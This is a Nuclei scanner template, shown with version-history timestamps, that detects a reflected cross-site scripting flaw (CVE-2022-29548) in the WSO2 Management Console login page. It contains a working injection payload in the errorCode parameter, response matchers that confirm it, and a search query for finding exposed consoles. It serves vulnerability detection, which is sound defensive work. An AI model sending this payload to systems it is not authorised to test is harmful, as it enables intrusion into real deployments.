nuclei-templates/http/cves/2022/CVE-2022-29548.yaml

52 lines
2.1 KiB
YAML
Raw Normal View History

2022-05-09 10:25:53 +00:00
id: CVE-2022-29548
info:
name: WSO2 - Cross-Site Scripting
2022-05-09 10:25:53 +00:00
author: edoardottt
severity: medium
2022-05-09 17:01:59 +00:00
description: |
WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability.
2022-05-09 17:01:59 +00:00
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
- http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/
2022-05-09 10:25:53 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29548
cwe-id: CWE-79
epss-score: 0.00299
epss-percentile: 0.6609
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:*
2022-05-09 10:25:53 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: wso2
product: api_manager
2023-09-06 11:59:08 +00:00
google-query: inurl:"carbon/admin/login"
tags: cve,cve2022,wso2,xss,packetstorm
2022-05-09 10:25:53 +00:00
http:
2022-05-09 10:25:53 +00:00
- method: GET
path:
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
matchers-condition: and
matchers:
2022-05-09 17:01:59 +00:00
- type: word
part: body
words:
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
2022-05-09 10:25:53 +00:00
- type: word
part: header
words:
- "text/html"
2022-05-09 17:01:59 +00:00
- type: status
status:
- 200
# digest: 490a00463044022078d574acb9574c658fd3c3aa17f787f713f3ea207e37f933e99e178e5bc9f3e8022003d2218cd7b97003a5a4c325db32bf4ab78346db367556234fc4bb53a7703300:922c64590222798bb761d5b6d8e72950